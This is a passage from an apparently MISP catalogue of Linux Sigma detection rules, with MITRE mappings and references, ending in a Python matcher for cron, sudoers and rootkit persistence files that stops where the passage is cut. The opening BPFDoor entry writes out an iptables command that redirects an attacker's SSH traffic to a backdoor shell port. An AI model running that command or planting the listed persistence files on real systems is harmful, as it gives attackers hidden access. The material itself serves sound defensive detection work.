All TCP traffic on a particular port from the attacker is routed to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'. The traffic looks like encrypted SSH communication going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule, for the attacker host only.

The tag is: misp-galaxy:sigma-rules="Bpfdoor TCP Ports Redirect"

Bpfdoor TCP Ports Redirect has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11525. Table References

Links

https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor

https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml

Program Executions in Suspicious Folders

Detects program executions in suspicious non-program folders related to malware or hacking activity

The tag is: misp-galaxy:sigma-rules="Program Executions in Suspicious Folders"

Program Executions in Suspicious Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"

Table 11526. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml

Remove Immutable File Attribute - Auditd

Detects removal of the immutable file attribute.

The tag is: misp-galaxy:sigma-rules="Remove Immutable File Attribute - Auditd"

Remove Immutable File Attribute - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11527. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml

Data Compressed

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Data Compressed"

Data Compressed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 11528. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml

Linux Network Service Scanning - Auditd

Detects enumeration of local or remote network services.

The tag is: misp-galaxy:sigma-rules="Linux Network Service Scanning - Auditd"

Linux Network Service Scanning - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 11529. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml

Screen Capture with Xwd

Detects an adversary creating a full screen capture with xwd. Using this rule on servers is highly recommended, due to the high usage of screenshot utilities on user workstations.

The tag is: misp-galaxy:sigma-rules="Screen Capture with Xwd"

Screen Capture with Xwd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11530. Table References

Links

https://linux.die.net/man/1/xwd

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml

System Shutdown/Reboot - Linux

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

The tag is: misp-galaxy:sigma-rules="System Shutdown/Reboot - Linux"

System Shutdown/Reboot - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 11531. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml

Password Policy Discovery

Detects password policy discovery commands

The tag is: misp-galaxy:sigma-rules="Password Policy Discovery"

Password Policy Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 11532. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md

https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu

https://man7.org/linux/man-pages/man1/passwd.1.html

https://linux.die.net/man/1/chage

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml

System Information Discovery - Auditd

Detects System Information Discovery commands

The tag is: misp-galaxy:sigma-rules="System Information Discovery - Auditd"

System Information Discovery - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11533. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml

Overwriting the File with Dev Zero or Null

Detects overwriting (effectively wiping/deleting) of a file.

The tag is: misp-galaxy:sigma-rules="Overwriting the File with Dev Zero or Null"

Overwriting the File with Dev Zero or Null has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11534. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml

Linux Keylogging with Pam.d

Detects attempts to enable auditing of TTY input

The tag is: misp-galaxy:sigma-rules="Linux Keylogging with Pam.d"

Linux Keylogging with Pam.d has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 11535. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md

https://access.redhat.com/articles/4409591#audit-record-types-2

https://linux.die.net/man/8/pam_tty_audit

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml

Suspicious Commands Linux

Detects relevant commands often related to malware or hacking activity

The tag is: misp-galaxy:sigma-rules="Suspicious Commands Linux"

Suspicious Commands Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11536. Table References

Links

Internal Research - mostly derived from exploit code including code in MSF

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml

Hidden Files and Directories

Detects an adversary creating a hidden file or directory, by detecting directories or files with . as the first character

The tag is: misp-galaxy:sigma-rules="Hidden Files and Directories"

Hidden Files and Directories has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 11537. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml

Creation Of An User Account

Detects the creation of a new user account. Such accounts may be used for persistence and do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:sigma-rules="Creation Of An User Account"

Creation Of An User Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 11538. Table References

Links

https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07

https://access.redhat.com/articles/4409591#audit-record-types-2

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml

Shellshock Expression

Detects shellshock expressions in log files

The tag is: misp-galaxy:sigma-rules="Shellshock Expression"

Shellshock Expression has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11540. Table References

Links

https://owasp.org/www-pdf-archive/Shellshock-_Tudor_Enache.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml

Remote File Copy

Detects the use of tools that copy files from or to remote systems

The tag is: misp-galaxy:sigma-rules="Remote File Copy"

Remote File Copy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11541. Table References

Links

https://attack.mitre.org/techniques/T1105/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml

Equation Group Indicators

Detects suspicious shell commands used in various Equation Group scripts and tools

The tag is: misp-galaxy:sigma-rules="Equation Group Indicators"

Equation Group Indicators has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11542. Table References

Links

https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml

Symlink Etc Passwd

Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd

The tag is: misp-galaxy:sigma-rules="Symlink Etc Passwd"

Symlink Etc Passwd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 11543. Table References

Links

https://www.qualys.com/2021/05/04/21nails/21nails.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml

Potential Suspicious BPF Activity - Linux

Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages, which could be a sign of suspicious eBPF activity on the system.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious BPF Activity - Linux"

Table 11544. Table References

Links

https://man7.org/linux/man-pages/man7/bpf-helpers.7.html

https://redcanary.com/blog/ebpf-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml

Commands to Clear or Remove the Syslog - Builtin

Detects specific commands commonly used to remove or empty the syslog

The tag is: misp-galaxy:sigma-rules="Commands to Clear or Remove the Syslog - Builtin"

Commands to Clear or Remove the Syslog - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 11545. Table References

Links

https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml

Buffer Overflow Attempts

Detects buffer overflow attempts in Unix system log files

The tag is: misp-galaxy:sigma-rules="Buffer Overflow Attempts"

Buffer Overflow Attempts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 11546. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml

Suspicious Reverse Shell Command Line

Detects suspicious shell commands or program code that may be executed or used on the command line to establish a reverse shell

The tag is: misp-galaxy:sigma-rules="Suspicious Reverse Shell Command Line"

Suspicious Reverse Shell Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11547. Table References

Links

https://alamot.github.io/reverse_shells/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml

Suspicious Log Entries

Detects suspicious log entries in Linux log files

The tag is: misp-galaxy:sigma-rules="Suspicious Log Entries"

Table 11548. Table References

Links

https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml

Privileged User Has Been Created

Detects the addition of a new user to a privileged group such as "root" or "sudo"

The tag is: misp-galaxy:sigma-rules="Privileged User Has Been Created"

Privileged User Has Been Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 11549. Table References

Links

https://linux.die.net/man/8/useradd

https://digital.nhs.uk/cyber-alerts/2018/cc-2825

https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml

Nimbuspwn Exploitation

Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)

The tag is: misp-galaxy:sigma-rules="Nimbuspwn Exploitation"

Nimbuspwn Exploitation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 11550. Table References

Links

https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/

https://github.com/Immersive-Labs-Sec/nimbuspwn

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml

JexBoss Command Sequence

Detects suspicious command sequence that JexBoss

The tag is: misp-galaxy:sigma-rules="JexBoss Command Sequence"

JexBoss Command Sequence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11551. Table References

Links

https://www.us-cert.gov/ncas/analysis-reports/AR18-312A

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml

Space After Filename

Detects space after filename

The tag is: misp-galaxy:sigma-rules="Space After Filename"

Table 11552. Table References

Links

https://attack.mitre.org/techniques/T1064

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml

Code Injection by ld.so Preload

Detects the ld.so preload persistence file. See man ld.so for more information.

The tag is: misp-galaxy:sigma-rules="Code Injection by ld.so Preload"

Code Injection by ld.so Preload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"

Table 11553. Table References

Links

https://man7.org/linux/man-pages/man8/ld.so.8.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml

Suspicious Activity in Shell Commands

Detects suspicious shell commands used in various exploit codes (see references)

The tag is: misp-galaxy:sigma-rules="Suspicious Activity in Shell Commands"

Suspicious Activity in Shell Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 11554. Table References

Links

https://artkond.com/2017/03/23/pivoting-guide/

http://pastebin.com/FtygZ1cg

https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml

Clear Command History

Clearing of command history in Linux, which is used for defense evasion.

The tag is: misp-galaxy:sigma-rules="Clear Command History"

Clear Command History has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 11555. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md

https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml

Guacamole Two Users Sharing Session Anomaly

Detects a suspicious session with two users present

The tag is: misp-galaxy:sigma-rules="Guacamole Two Users Sharing Session Anomaly"

Guacamole Two Users Sharing Session Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 11556. Table References

Links

https://research.checkpoint.com/2020/apache-guacamole-rce/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml

Suspicious VSFTPD Error Messages

Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts

The tag is: misp-galaxy:sigma-rules="Suspicious VSFTPD Error Messages"

Suspicious VSFTPD Error Messages has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11557. Table References

Links

https://github.com/dagwieers/vsftpd/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml

Relevant ClamAV Message

Detects relevant ClamAV messages

The tag is: misp-galaxy:sigma-rules="Relevant ClamAV Message"

Relevant ClamAV Message has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1588.001" with estimative-language:likelihood-probability="almost-certain"

Table 11558. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml

Modifying Crontab

Detects suspicious modification of crontab file.

The tag is: misp-galaxy:sigma-rules="Modifying Crontab"

Modifying Crontab has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11559. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml

PwnKit Local Privilege Escalation

Detects potential PwnKit (CVE-2021-4034) exploitation in auth logs

The tag is: misp-galaxy:sigma-rules="PwnKit Local Privilege Escalation"

PwnKit Local Privilege Escalation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"

Table 11560. Table References

Links

https://twitter.com/wdormann/status/1486161836961579020

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml

SSHD Error Message CVE-2018-15473

Detects exploitation attempt using public exploit code for CVE-2018-15473

The tag is: misp-galaxy:sigma-rules="SSHD Error Message CVE-2018-15473"

SSHD Error Message CVE-2018-15473 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589" with estimative-language:likelihood-probability="almost-certain"

Table 11561. Table References

Links

https://github.com/Rhynorater/CVE-2018-15473-Exploit

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml

Suspicious OpenSSH Daemon Error

Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts

The tag is: misp-galaxy:sigma-rules="Suspicious OpenSSH Daemon Error"

Suspicious OpenSSH Daemon Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11562. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml

https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml

Sudo Privilege Escalation CVE-2019-14287 - Builtin

Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287

The tag is: misp-galaxy:sigma-rules="Sudo Privilege Escalation CVE-2019-14287 - Builtin"

Sudo Privilege Escalation CVE-2019-14287 - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

Table 11563. Table References

Links

https://twitter.com/matthieugarin/status/1183970598210412546

https://www.openwall.com/lists/oss-security/2019/10/14/1

https://access.redhat.com/security/cve/cve-2019-14287

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml

Suspicious Named Error

Detects suspicious named (DNS) error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts

The tag is: misp-galaxy:sigma-rules="Suspicious Named Error"

Suspicious Named Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11564. Table References

Links

https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml

Disabling Security Tools - Builtin

Detects disabling security tools

The tag is: misp-galaxy:sigma-rules="Disabling Security Tools - Builtin"

Disabling Security Tools - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11565. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml

Persistence Via Cron Files

Detects creation of a cron file or of files in cron directories, which could indicate potential persistence.

The tag is: misp-galaxy:sigma-rules="Persistence Via Cron Files"

Persistence Via Cron Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11566. Table References

Links

https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_cron_files.yml

Wget Creating Files in Tmp Directory

Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"

The tag is: misp-galaxy:sigma-rules="Wget Creating Files in Tmp Directory"

Wget Creating Files in Tmp Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11567. Table References

Links

https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection

https://blogs.jpcert.or.jp/en/2023/05/gobrat.html

https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection

https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml

Persistence Via Sudoers Files

Detects creation of the sudoers file or of files in the "sudoers.d" directory, which can be used as a method to persist privileges for a specific user.

The tag is: misp-galaxy:sigma-rules="Persistence Via Sudoers Files"

Persistence Via Sudoers Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11569. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml

Triple Cross eBPF Rootkit Default LockFile

Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Default LockFile"

Table 11570. Table References

Links

https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml

Triple Cross eBPF Rootkit Default Persistence

Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, both of which are part of the TripleCross persistence method

The tag is: misp-galaxy:sigma-rules="Triple Cross eBPF Rootkit Default Persistence"

Triple Cross eBPF Rootkit Default Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

Table 11571. Table References

Links

https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml

Linux Doas Conf File Creation

Detects the creation of the doas.conf file on a Linux host.

The tag is: misp-galaxy:sigma-rules="Linux Doas Conf File Creation"

Linux Doas Conf File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11572. Table References

Links

https://www.makeuseof.com/how-to-install-and-use-doas/

https://research.splunk.com/endpoint/linux_doas_conf_file_creation/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml
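The file_event rules above (Modifying Crontab, Persistence Via Cron Files, Persistence Via Sudoers Files, the two Triple Cross persistence entries and Linux Doas Conf File Creation) all reduce to the same question: was a file created under a path that grants scheduled or elevated execution? The matcher below is an added illustration of that check in Python, not the published Sigma rules' own selection lists; the watch list mirrors the directories and file names the descriptions above mention (cron directories and spool, sudoers and sudoers.d, doas.conf, the "ebpfbackdoor" and "rootlog" names), the field name TargetFilename is assumed from Sysmon for Linux, and every event is constructed sample data.

```python
"""Illustrative file_event matcher for the Linux persistence locations the
entries above describe. Added example, not the published Sigma rules'
own selection lists. All events below are constructed sample data."""
import fnmatch
import posixpath

# Assumed watch list: the directories and files named in the descriptions
# (cron spool and cron.* directories, sudoers and sudoers.d, doas.conf).
# Real rules carry longer lists and tuned exclusions; this is a starting point.
PERSISTENCE_PATTERNS = {
    "cron": [
        "/etc/crontab",
        "/etc/cron.d/*",
        "/etc/cron.hourly/*",
        "/etc/cron.daily/*",
        "/etc/cron.weekly/*",
        "/etc/cron.monthly/*",
        "/var/spool/cron/*",
    ],
    "sudoers": ["/etc/sudoers", "/etc/sudoers.d/*"],
    "doas": ["/etc/doas.conf"],
}

# Default artefact names the TripleCross entries above call out: the
# "ebpfbackdoor" persistence files and the "rootlog" lock file.
TRIPLECROSS_MARKERS = {"ebpfbackdoor", "rootlog"}


def classify_file_event(event: dict) -> list[str]:
    """Return the rule families a file-creation event would trigger.

    `event` needs a 'TargetFilename' (Sysmon-for-Linux field name, assumed).
    The path is normalised first so '/etc/cron.d/../cron.d/job' is not missed.
    """
    path = posixpath.normpath(event.get("TargetFilename", ""))
    hits = []
    for family, patterns in PERSISTENCE_PATTERNS.items():
        if any(fnmatch.fnmatchcase(path, pattern) for pattern in patterns):
            hits.append(family)
    if posixpath.basename(path) in TRIPLECROSS_MARKERS:
        hits.append("triplecross")
    return hits


def scan_file_events(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run every event through classify_file_event and keep the matches."""
    results = []
    for event in events:
        hits = classify_file_event(event)
        if hits:
            results.append((event["TargetFilename"], hits))
    return results


# Constructed sample events, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": "/usr/bin/crontab", "TargetFilename": "/var/spool/cron/crontabs/root"},
    {"Image": "/bin/bash", "TargetFilename": "/etc/cron.d/ebpfbackdoor"},
    {"Image": "/bin/bash", "TargetFilename": "/etc/sudoers.d/ebpfbackdoor"},
    {"Image": "/tmp/deployer", "TargetFilename": "/tmp/rootlog"},
    {"Image": "/usr/bin/vi", "TargetFilename": "/etc/doas.conf"},
    {"Image": "/usr/bin/vi", "TargetFilename": "/home/alice/notes.txt"},
]

if __name__ == "__main__":
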